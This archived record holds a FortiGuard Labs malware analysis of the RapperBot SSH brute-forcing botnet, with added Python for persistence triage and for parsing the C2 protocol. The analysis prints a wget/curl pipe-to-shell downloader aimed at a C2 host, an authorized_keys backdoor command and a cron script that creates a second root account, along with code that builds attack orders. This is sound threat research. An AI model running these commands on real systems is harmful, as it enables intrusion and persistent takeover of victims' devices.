{
	"id": "c0238ad0-ce31-4abd-a74c-106fa4bdd2ca",
	"created_at": "2026-04-06T00:15:54.214452Z",
	"updated_at": "2026-04-10T03:25:15.73777Z",
	"deleted_at": null,
	"sha1_hash": "e763a6edb334a546e2aeb50d66c28991b1601af2",
	"title": "So RapperBot, What Ya Bruting For? | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 605767,
	"plain_text": "So RapperBot, What Ya Bruting For? | FortiGuard Labs\r\nPublished: 2022-08-03 · Archived: 2026-04-05 17:31:32 UTC\r\nFortiGuard Labs has been tracking a rapidly evolving IoT malware family known as “RapperBot” since mid-June 2022. This\r\nfamily borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its\r\nbuilt-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai.\r\nIn addition, recent samples show that its developers have started adding code to maintain persistence, which is rarely done in\r\nother Mirai variants. This provides threat actors with continued access to infected devices via SSH even after the device is\r\nrebooted or the malware has been removed.\r\nAffected Platforms: Linux\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: Critical\r\nThis article reveals how this threat infects and persists on a victim device, as well as interesting changes that make us\r\nquestion the real intention of the threat actors.\r\nDiscovery\r\nIn June 2022, FortiGuard Labs encountered IoT malware samples with SSH-related strings, something not often seen in\r\nother IoT threat campaigns. What piqued our interest more was the size of the code referencing these strings in relation to\r\nthe code used for DDoS attacks, which usually comprises most of the code in other variants.\r\nUpon further analysis, we discovered that this malware family, dubbed \"RapperBot,” is designed to function primarily as an\r\nSSH brute forcer with limited DDoS capabilities. As is typical of most IoT malware, it targets ARM, MIPS, SPARC, and\r\nx86 architectures.\r\nThe name “RapperBot” comes from an early July report from CNCERT where an embedded URL to a YouTube rap music\r\nvideo was found in older samples. 
The samples of RapperBot released after this report do not contain this URL.\r\nHello From the Other Side\r\nRapperBot heavily reuses parts of the Mirai source code, but its features and implementation details, e.g., the Command \u0026\r\nControl (C2) command protocol, differ significantly from the original Mirai and typical Mirai-based variants monitored by\r\nFortiGuard Labs.\r\nUnlike the majority of Mirai variants, which natively brute force Telnet servers using default or weak passwords, RapperBot\r\nexclusively scans and attempts to brute force SSH servers configured to accept password authentication. The bulk of the\r\nmalware code contains an implementation of an SSH 2.0 client that can connect and brute force any SSH server that\r\nsupports Diffie-Hellman key exchange with 768-bit or 2048-bit keys and data encryption using AES128-CTR.\r\nA distinctive feature of the brute forcing implementation in RapperBot is the use of “SSH-2.0-HELLOWORLD” to identify\r\nitself to the target SSH server during the SSH Protocol Exchange phase. The appearance of RapperBot in mid-June\r\ncoincides with the observation of this same client identification string by SANS Internet Storm Center in their honeypot\r\nlogs.\r\nEarlier samples had the brute-forcing credential list hardcoded into the binary. From July onwards, samples retrieve this\r\nlist from another port on the C2 server. This allows the threat actors to continually add new SSH credentials without having\r\nto update infected devices with new samples. This port number ranges from 4343 to 4345 in the latest samples.\r\nOnce RapperBot successfully brute forces an SSH server, the valid credentials are reported to the C2 server on a separate\r\nport (currently 48109) without executing further commands on the remote victim.\r\nIn late June, however, FortiGuard Labs found some samples that attempted to self-propagate via a remote binary downloader\r\npost-compromise.\r\n
The commands executed on the compromised SSH server are shown below.\r\nsh\r\nenable\r\nshell\r\ndebug shell\r\ncmd\r\nwget http://2[.]58[.]149[.]116/w -O- | sh; curl http://2[.]58[.]149[.]116/c -O- | sh\r\nhttps://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nPage 1 of 6\n\nFor unknown reasons, this propagation functionality was removed in samples collected a few days later and has not been\r\nseen in subsequent samples. As with the original Mirai, we suspect the threat actors have implemented a separate loader\r\nsystem that would subsequently connect to the victim to download and execute the bot client.\r\nNever Gonna Give You Up\r\nSince mid-July, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH\r\nservers. It runs a shell command to replace remote victims’ ~/.ssh/authorized_keys with one containing the threat actors’\r\nSSH public key with the comment “helloworld,” as shown below.\r\ncd ~ \u0026\u0026 rm -rf .ssh \u0026\u0026 mkdir .ssh \u0026\u0026 echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPem\r\nHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73\r\nqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4\r\nFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6bt\r\nZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x\r\n2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== helloworld\"\u003e\u003e.ssh/authorized_keys \u0026\u0026 chmod -R\r\ngo= ~/.ssh \u0026\u0026 cd ~;\r\nPublic keys stored in ~/.ssh/authorized_keys allow anyone with the corresponding private key to connect and authenticate to\r\nan SSH server without needing to supply a password.\r\n
This presents a threat to compromised SSH servers as threat actors can\r\naccess them even after SSH credentials have been changed or SSH password authentication is disabled. Moreover, since the\r\nfile is replaced, all existing authorized keys are deleted, which prevents legitimate users from accessing the SSH server via\r\npublic key authentication.\r\nApart from maintaining access to every SSH server that it brute forces, RapperBot is also very intent on retaining its\r\nfoothold on any devices on which it is executed. Samples from mid-July append the same aforementioned SSH key to the\r\nlocal ~/.ssh/authorized_keys on the infected device upon execution. This allows RapperBot to maintain its access to these\r\ninfected devices via SSH even after a device reboot or the removal of RapperBot from the device, something that is\r\natypical of most Mirai variants. In an attempt to better hide in plain sight, the latest samples use a more innocuous comment,\r\n“system key generated by server 20220709”, for the public key instead of “helloworld”.\r\nIn the latest RapperBot samples, the malware also started adding the root user “suhelper” to the infected device by directly\r\nwriting to /etc/passwd and /etc/shadow, further allowing the threat actor to take complete control of the device. In\r\nconjunction, it re-creates the account every hour through the following script written to /etc/cron.hourly/0, in case other\r\nusers (or competing botnets) remove it from the victim system. The -o flag lets useradd assign the already-taken UID 0, so\r\nsuhelper is a second root account alongside root rather than a replacement for it. The command to add the root user is\r\nprovided below.\r\n#!/bin/sh\r\nuseradd -u 0 -g 0 -o -d / suhelper -p '$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/' \u003e/dev/null 2\u003e\u00261\r\nFigure 1 illustrates how the latest samples of RapperBot work.\r\n
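The persistence artefacts described in this section (the injected authorized_keys entry, the suhelper UID 0 account in /etc/passwd and /etc/shadow, and the hourly re-creation script in /etc/cron.hourly/0) can be checked from copies of those files taken off a suspect device. The Python below is an added example for this archived copy, not FortiGuard Labs or RapperBot code. The indicator values (the leading part of the key blob, the two key comments, the account name and its hash) are taken from the report; the SAMPLE_* file contents are constructed for the demonstration and the ed25519 entry in them is a placeholder, not a real key.

```python
# Triage of RapperBot persistence artefacts on a Linux host.
# Added example, not FortiGuard Labs code. Indicator values come from the
# report; the SAMPLE_* file contents further down are constructed for the demo.
import shlex

# Leading part of the threat actor's RSA key blob (identical in both copies
# printed in the report) and the two comments the key has been seen with.
KEY_PREFIX = ('AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8'
              'tpQWT2cX/mwGgSRCz7HMLyxt87olYIPem')
KEY_COMMENTS = {'helloworld', 'system key generated by server 20220709'}
ROGUE_USER = 'suhelper'
ROGUE_HASH = '$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/'


def rogue_authorized_keys(text):
    '''Return (line_no, reason) for entries matching the actor's key blob or comments.'''
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith('#'):
            continue
        if parts[1].startswith(KEY_PREFIX):
            hits.append((no, 'known RapperBot key blob'))
        elif ' '.join(parts[2:]) in KEY_COMMENTS:
            # Comment-only match is weaker: the operator already changed it once.
            hits.append((no, 'RapperBot key comment'))
    return hits


def extra_uid0_accounts(passwd_text):
    '''Return non-root account names with UID 0 (useradd -o permits the duplicate UID).'''
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(':')
        if len(fields) >= 3 and fields[2] == '0' and fields[0] != 'root':
            names.append(fields[0])
    return names


def accounts_with_hash(shadow_text, wanted_hash):
    '''Return account names whose shadow password field equals wanted_hash.'''
    hits = []
    for line in shadow_text.splitlines():
        fields = line.split(':')
        if len(fields) >= 2 and fields[1] == wanted_hash:
            hits.append(fields[0])
    return hits


def cron_adds_uid0(script_text):
    '''True if a shell script (such as /etc/cron.hourly/0) runs useradd with -u 0.'''
    for line in script_text.splitlines():
        try:
            argv = shlex.split(line, comments=True)
        except ValueError:          # unbalanced quotes: nothing we can judge
            continue
        if not argv or argv[0].rsplit('/', 1)[-1] != 'useradd':
            continue
        for i, arg in enumerate(argv):
            if (arg == '-u' and i + 1 < len(argv) and argv[i + 1] == '0') or arg == '-u0':
                return True
    return False


def triage(authorized_keys, passwd, shadow, cron_scripts):
    '''Aggregate the checks into a list of findings (empty list means none of these indicators).'''
    findings = []
    for no, why in rogue_authorized_keys(authorized_keys):
        findings.append(f'authorized_keys line {no}: {why}')
    for name in extra_uid0_accounts(passwd):
        tag = 'RapperBot suhelper' if name == ROGUE_USER else 'unexpected'
        findings.append(f'/etc/passwd: {tag} UID 0 account {name}')
    for name in accounts_with_hash(shadow, ROGUE_HASH):
        findings.append(f'/etc/shadow: {name} carries the published suhelper hash')
    for path, body in cron_scripts.items():
        if cron_adds_uid0(body):
            findings.append(f'{path}: cron job re-creates a UID 0 account')
    return findings


# Constructed sample files modelled on the report; the ed25519 entry is a placeholder.
SAMPLE_AUTHORIZED_KEYS = '''ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyNotRealxxxxxxxxxxxxxxxxxxxx admin@ops
ssh-rsa ''' + KEY_PREFIX + '''TRUNCATEDFORDEMO== system key generated by server 20220709
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDotherKeyTruncatedForDemo== helloworld
'''
SAMPLE_PASSWD = '''root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
suhelper:x:0:0::/:
'''
SAMPLE_SHADOW = '''root:*:19185:0:99999:7:::
suhelper:$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/:19185:0:99999:7:::
'''
SAMPLE_CRON = '''#!/bin/sh
useradd -u 0 -g 0 -o -d / suhelper -p '$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/' >/dev/null 2>&1
'''

if __name__ == '__main__':
    for finding in triage(SAMPLE_AUTHORIZED_KEYS, SAMPLE_PASSWD, SAMPLE_SHADOW,
                          {'/etc/cron.hourly/0': SAMPLE_CRON}):
        print(finding)
```

Feed the functions the contents of the real files (every user's ~/.ssh/authorized_keys, not only root's, plus each script under /etc/cron.hourly) and treat an empty result as the absence of these specific indicators only; the comment match in particular is weak, since the operator has already changed the comment once.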
Dotted lines in Figure 1 indicate potential actions that FortiGuard Labs\r\nassesses the threat actor could perform but that have not been observed in the wild.\r\nFigure 1: RapperBot execution flow\r\nYou Can’t See Me\r\nWhile early samples had strings in plaintext, subsequent samples added extra obfuscation to the strings by building them on\r\nthe stack. This prevents common analysis tools and detection techniques from extracting human-readable strings from\r\nbinary files (Figure 2).\r\nFigure 2: String encoding in RapperBot samples\r\nFurthermore, these latest samples implemented an additional layer of Mirai-style XOR encoding to hide these strings from\r\nmemory scanners during execution.\r\nWhile most Mirai and Gafgyt botnet operators, like Keksec, tend to include strings identifying themselves within the\r\nmalware samples, the developers of this malware maintain a relatively low profile (apart from occasional references to rap\r\nmusic).\r\nNetwork Protocol\r\nRapperBot communicates with its C2 server via TCP connections to separate ports to receive commands (443 in the latest\r\nsamples), download SSH credential lists, or report valid credentials during SSH brute forcing.\r\nThe network protocol for commands is explained in further detail below.\r\nEach request contains a bot ID, a 32-byte value hardcoded in the binary. FortiGuard Labs observed two IDs as follows:\r\nd4 1c 74 44 70 95 28 ff f0 98 ae 4e 6f 92 ba d5 0f cd 56 29 c5 12 53 a1 fe 46 53 c7 0b b5 18 27\r\nf6 b7 0b 00 14 77 35 f9 8d 6d 5d c4 bd 23 88 7e cf 5e 02 ce 54 5f e7 b1 e6 3f 2a 16 71 b6 eb 9a (a separate cluster seen only\r\nin late December 2021)\r\nAs a side note, pivoting on these bot IDs allowed us to find older samples from November 2021. However, the SSH brute\r\nforcing capability was only seen in samples from mid-June 2022.\r\nRapperBot starts by sending a registration packet to the C2 server.\r\n
This includes the argument (referred to as “source” by\r\nMirai) used when the binary was executed in the victim system, which usually provides some basic contextual info about its\r\nexecution. For instance, “ssh.wget.arm7” would tell the C2 that the binary was spread via SSH protocol, downloaded via the\r\nwget utility, and is of ARM architecture.\r\nThe registration packet has the following structure:\r\nstruct rapperbot_registration {\r\n    byte bot_id[32];\r\n    int command_code;  // 0x00\r\n    byte source[32];   // execution argument, e.g. ssh.wget.arm7\r\n};\r\nHere are the command codes supported by RapperBot:\r\n0x00: Register (used by the client)\r\n0x01: Keep-Alive/Do nothing\r\n0x02: Stop all DoS attacks and terminate the client\r\n0x03: Perform a DoS attack\r\n0x04: Stop all DoS attacks\r\nRight after the registration packet, the client sends another request to notify the C2 that the client is ready to receive\r\ncommands. The C2 server usually responds with a keep-alive command to acknowledge the request (Figure 3).\r\nFigure 3: RapperBot client-server communication\r\nBesides the keep-alive command, we did not observe any other commands from the C2 server during our analysis.\r\nHowever, RapperBot does support a very minimal set of DoS attacks, including plain UDP and TCP STOMP flood attacks\r\nthat are very similar to Mirai’s implementation.\r\nThe attack command structure is as follows:\r\nstruct rapperbot_attack_command {\r\n    byte bot_id[32];\r\n    int command_code;  // 0x03\r\n    byte vector; // type of DoS attack\r\n    ushort target_port;\r\n    int duration;\r\n    int target_ip;\r\n};\r\nMystery Motivation\r\nFortiGuard Labs has been monitoring this threat for over a month.\r\n
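The two message layouts from the Network Protocol section can be exercised end to end: the client side packs a registration, the server side packs a keep-alive and an attack order, and both are parsed back and summarised. The Python below is an added example written for this archived copy, not FortiGuard Labs or RapperBot code. The report does not state byte order, field padding, how the source string is terminated or how attack vectors are numbered; the example assumes big-endian (network) order with no padding and a NUL-padded source field, uses 0 as a placeholder vector, and uses the two published bot IDs to label a message as coming from a known or unknown bot.

```python
# Encoder/decoder for the RapperBot C2 messages described in the Network Protocol
# section. Added example, not FortiGuard Labs or RapperBot code. Assumptions the
# report does not state: fields are packed without padding, multi-byte integers are
# big-endian (network order, as in Mirai), source is a NUL-padded 32-byte field, and
# attack vector numbering is unknown (0 is used as a placeholder below).
import socket
import struct
from dataclasses import dataclass

CMD_REGISTER, CMD_KEEPALIVE, CMD_STOP_AND_EXIT, CMD_ATTACK, CMD_STOP_ATTACKS = range(5)
CMD_NAMES = {
    CMD_REGISTER: 'register',
    CMD_KEEPALIVE: 'keep-alive',
    CMD_STOP_AND_EXIT: 'stop attacks and terminate',
    CMD_ATTACK: 'attack',
    CMD_STOP_ATTACKS: 'stop attacks',
}

HEADER = struct.Struct('>32si')       # byte bot_id[32]; int command_code
REG_TAIL = struct.Struct('>32s')      # source[32]
ATTACK_TAIL = struct.Struct('>BHii')  # byte vector; ushort target_port; int duration; int target_ip

# The two bot IDs published in the report.
BOT_ID_MAIN = bytes.fromhex('d41c7444709528fff098ae4e6f92bad50fcd5629c51253a1fe4653c70bb51827')
BOT_ID_DEC2021 = bytes.fromhex('f6b70b00147735f98d6d5dc4bd23887ecf5e02ce545fe7b1e63f2a1671b6eb9a')
KNOWN_BOT_IDS = {BOT_ID_MAIN, BOT_ID_DEC2021}


@dataclass
class Message:
    bot_id: bytes
    command: int
    source: str = ''        # registration only
    vector: int = 0         # attack only, from here down
    target_port: int = 0
    duration: int = 0
    target_ip: str = ''


def build_registration(bot_id, source):
    '''Client to C2: registration carrying the execution argument, e.g. ssh.wget.arm7.'''
    return HEADER.pack(bot_id, CMD_REGISTER) + REG_TAIL.pack(source.encode('ascii'))


def build_simple(bot_id, command):
    '''Header-only message (keep-alive, stop attacks, stop and terminate).'''
    return HEADER.pack(bot_id, command)


def build_attack(bot_id, vector, target_ip, target_port, duration):
    '''C2 to client: flood target_ip:target_port with the given vector for duration seconds.'''
    (ip,) = struct.unpack('>i', socket.inet_aton(target_ip))
    return HEADER.pack(bot_id, CMD_ATTACK) + ATTACK_TAIL.pack(vector, target_port, duration, ip)


def parse(data):
    '''Decode one message; raises ValueError on truncation or an unknown command code.'''
    if len(data) < HEADER.size:
        raise ValueError('truncated header')
    bot_id, command = HEADER.unpack_from(data)
    msg = Message(bot_id, command)
    body = data[HEADER.size:]
    if command == CMD_REGISTER:
        if len(body) < REG_TAIL.size:
            raise ValueError('truncated registration')
        (raw,) = REG_TAIL.unpack_from(body)
        msg.source = raw.split(bytes(1))[0].decode('ascii', 'replace')  # strip NUL padding
    elif command == CMD_ATTACK:
        if len(body) < ATTACK_TAIL.size:
            raise ValueError('truncated attack command')
        msg.vector, msg.target_port, msg.duration, ip = ATTACK_TAIL.unpack_from(body)
        msg.target_ip = socket.inet_ntoa(struct.pack('>i', ip))
    elif command not in CMD_NAMES:
        raise ValueError(f'unknown command code {command:#x}')
    return msg


def describe(msg):
    '''One-line summary for a detection log, flagging whether the bot ID is a published one.'''
    known = 'known' if msg.bot_id in KNOWN_BOT_IDS else 'unknown'
    text = f'{CMD_NAMES[msg.command]} from {known} bot {msg.bot_id.hex()[:8]}'
    if msg.command == CMD_REGISTER:
        text += f' source={msg.source}'
    elif msg.command == CMD_ATTACK:
        text += f' vector={msg.vector} target={msg.target_ip}:{msg.target_port} duration={msg.duration}s'
    return text


def demo():
    '''Registration, the keep-alive acknowledgement, and an attack order, round-tripped.'''
    wire = [
        build_registration(BOT_ID_MAIN, 'ssh.wget.arm7'),
        build_simple(BOT_ID_MAIN, CMD_KEEPALIVE),
        build_attack(BOT_ID_MAIN, 0, '203.0.113.10', 80, 60),   # vector 0 is a placeholder
    ]
    return [describe(parse(packet)) for packet in wire]


if __name__ == '__main__':
    for line in demo():
        print(line)
```

The length checks in parse matter when carving messages out of a capture: under these assumptions a registration is 68 bytes and an attack order 47, so a shorter segment should be rejected as truncated rather than decoded partially. If a real capture disagrees with the byte order assumed here, change the > in the three Struct formats to <.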
Over that period, RapperBot has undergone several interesting\r\nchanges that raise more questions than answers when attempting to pinpoint the primary motivation of the threat actors in\r\nlaunching this campaign.\r\nAt one point, samples were observed where the DDoS attack capabilities were entirely removed and added back a week\r\nlater. Could the DDoS functionality have been retained for masquerading as a typical DDoS botnet to avoid drawing too\r\nmuch attention? It is also possible that this whole campaign is still a work in progress.\r\nAdditionally, self-propagation was removed after a few days in late June, with the current focus on aggressively retaining\r\ncontinued access to brute-forced SSH servers. Are the threat actors more interested in collecting compromised SSH devices\r\nthan expanding their botnet?\r\nOn top of that, we have not seen additional payloads delivered after brute forcing. We can only speculate on why the threat\r\nactors are amassing a rapidly growing collection of compromised SSH servers. Over 3,500 unique IPs have been observed in\r\nthe past 1.5 months attempting to scan and brute-force SSH servers with the SSH-2.0-HELLOWORLD client identification\r\nstring. IPs from the US, Taiwan, and South Korea comprised half of the observed IPs (Figure 4).\r\nFigure 4: Scanner IP Count from mid-June 2022 to late July 2022\r\nConclusion\r\nAlthough this threat heavily borrows code from Mirai, it has features that set it apart from its predecessor and its variants.\r\n
Its\r\nability to persist in the victim system gives threat actors the flexibility to use those systems for any malicious purpose they desire.\r\nDue to some significant and curious changes that RapperBot has undergone, its primary motivation is still a bit of a mystery.\r\nRegardless, since its primary propagation method is brute forcing SSH credentials, new infections can be prevented by\r\nsetting strong passwords for devices or disabling password authentication for SSH (where possible). On a device that has\r\nalready been brute forced, changing the password is not enough: the threat actors’ authorized_keys entry, the suhelper\r\naccount and the /etc/cron.hourly/0 script described above must also be removed, since that persistence survives a\r\ncredential change.\r\nFortiGuard Labs will continue to monitor RapperBot’s development.\r\nFortinet Protections\r\nFortinet customers are protected by the following:\r\nThe FortiGuard Antivirus service detects and blocks this threat as ELF/Mirai and Linux/Mirai.\r\nThe FortiGuard Web Filtering Service blocks the C2 servers and downloaded URLs.\r\nFortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source\r\nIP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global\r\nsources that collaborate to provide up-to-date threat intelligence about hostile\r\n
sources.\r\nIOCs\r\nFiles\r\n92ae77e9dd22e7680123bb230ce43ef602998e6a1c6756d9e2ce5822a09b37b4\r\na31f4caa0be9e588056c92fd69c8ac970ebc7e85a68615b1d9407a954d4df45d\r\ne8d06ac196c7852ff71c150b2081150be9996ff670550717127db8ab855175a8\r\n23a415d0ec6d3131f1d537836d3c0449097e98167b18fbdbf2efca789748818a\r\nc83f318339e9c4072010b625d876558d14eaa0028339db9edf12bbcafe6828bb\r\n05c78eaf32af9647f178dff981e6e4e43b1579d95ccd4f1c2f1436dbfa0727ad\r\n88bbb772b8731296822646735aacbfb53014fbb7f90227b44523d7577e0a7ce6\r\ne8f1e8ec6b94ea54488d5f714e71e51d58dcdfe4be3827c55970d6f3b06edf73\r\n23256f231f3d91b0136b44d649b924552607a29b43a195024dbe6cde5b4a28ad\r\n77b2e5fb5b72493bde35a6b29a66e6250b6a5a0c9b9c5653957f64a12c793cd5\r\ndcdeedee4736ec528d1a30a585ec4a1a4f3462d6d25b71f6c1a4fef7f641e7ae\r\nebb860512a55c1cdc8be1399eec44c4481aedb418f15dbda4612e6d38e9b9010\r\n9d234e975e4df539a217d1c4386822be1f56cea35f7dd2aa606ae4995894da42\r\n1975851c916587e057fa5862884cbac3fa1e80881ddd062392486f5390c86865\r\nhttps://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery\r\nPage 5 of 6\n\n8380321c1bd250424a0a167e0f319511611f73b53736895a8d3a2ad58ffcd5d5\r\nf5ff9d1261af176d7ff1ef91aa8c892c70b40caa02c17a25de22539e9d0cdd26\r\n2298071b6ba7baa5393be064876efcdbd9217c212e0c764ba62a6f0ffc83cc5a\r\n2479932a6690f070fa344e5222e3fbb6ad9c880294d5b822d7a3ec27f1b8b8d5\r\n1d5e6624a2ce55616ef078a72f25c9d71a3dbc0175522c0d8e07233115824f96\r\n746106403a98aea357b80f17910b641db9c4fedbb3968e75d836e8b1d5712a62\r\nddf5aff0485f395c7e6c3de868b15212129962b4b9c8040bef6679ad880e3f31\r\ne56edaa1e06403757e6e2362383d41db4e4453aafda144bb36080a1f1b899a02\r\n55ff25b090dc1b380d8ca152428ba28ec14e9ef13a48b3fd162e965244b0d39b\r\n8e9f87bb25ff83e4ad970366bba47afb838028f7028ea3a7c73c4d08906ec102\r\nd86d158778a90f6633b41a10e169b25e3cb1eb35b369a9168ec64b2d8b3cbeec\r\nff09cf7dfd1dc1466815d4df098065510eec504099ebb02b830309067031fe04\r\nDownload 
URLs\r\nhxxp://31[.]44[.]185[.]235/x86\r\nhxxp://31[.]44[.]185[.]235/mips\r\nhxxp://31[.]44[.]185[.]235/arm7\r\nhxxp://2[.]58[.]149[.]116/arm\r\nhxxp://2[.]58[.]149[.]116/spc\r\nhxxp://2[.]58[.]149[.]116/mips\r\nhxxp://2[.]58[.]149[.]116/x86_64\r\nhxxp://2[.]58[.]149[.]116/ssh/arm7\r\nhxxp://2[.]58[.]149[.]116/ssh/mips\r\nhxxp://2[.]58[.]149[.]116/ssh/x86\r\nhxxp://2[.]58[.]149[.]116/ssh/spc\r\nhxxp://194[.]31[.]98[.]244/ssh/new/spc\r\nhxxp://194[.]31[.]98[.]244/ssh/new/x86\r\nhxxp://194[.]31[.]98[.]244/ssh/new/mips\r\nhxxp://194[.]31[.]98[.]244/ssh/new/arm7\r\nhxxp://194[.]31[.]98[.]244/ssh/new/arm\r\nhxxp://185[.]225[.]73[.]196/ssh/new/arm\r\nhxxp://185[.]225[.]73[.]196/ssh/new/arm7\r\nhxxp://185[.]225[.]73[.]196/ssh/new/mips\r\nhxxp://185[.]225[.]73[.]196/ssh/new/x86\r\nC2\r\n31[.]44[.]185[.]235\r\n2[.]58[.]149[.]116\r\n194[.]31[.]98[.]244\r\n185[.]225[.]73[.]196\r\nThreat Actor SSH public key\r\nAAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIR\r\nGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFY\r\nNBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p\r\ngiIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4\r\nBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EO\r\nThreat Actor root user\r\n/etc/passwd suhelper:x:0:0::/:\r\n/etc/shadow suhelper:$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/:19185:0:99999:7:::\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nSource: 
https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery"
	],
	"report_names": [
		"rapperbot-malware-discovery"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434554,
	"ts_updated_at": 1775791515,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e763a6edb334a546e2aeb50d66c28991b1601af2.pdf",
		"text": "https://archive.orkl.eu/e763a6edb334a546e2aeb50d66c28991b1601af2.txt",
		"img": "https://archive.orkl.eu/e763a6edb334a546e2aeb50d66c28991b1601af2.jpg"
	}
}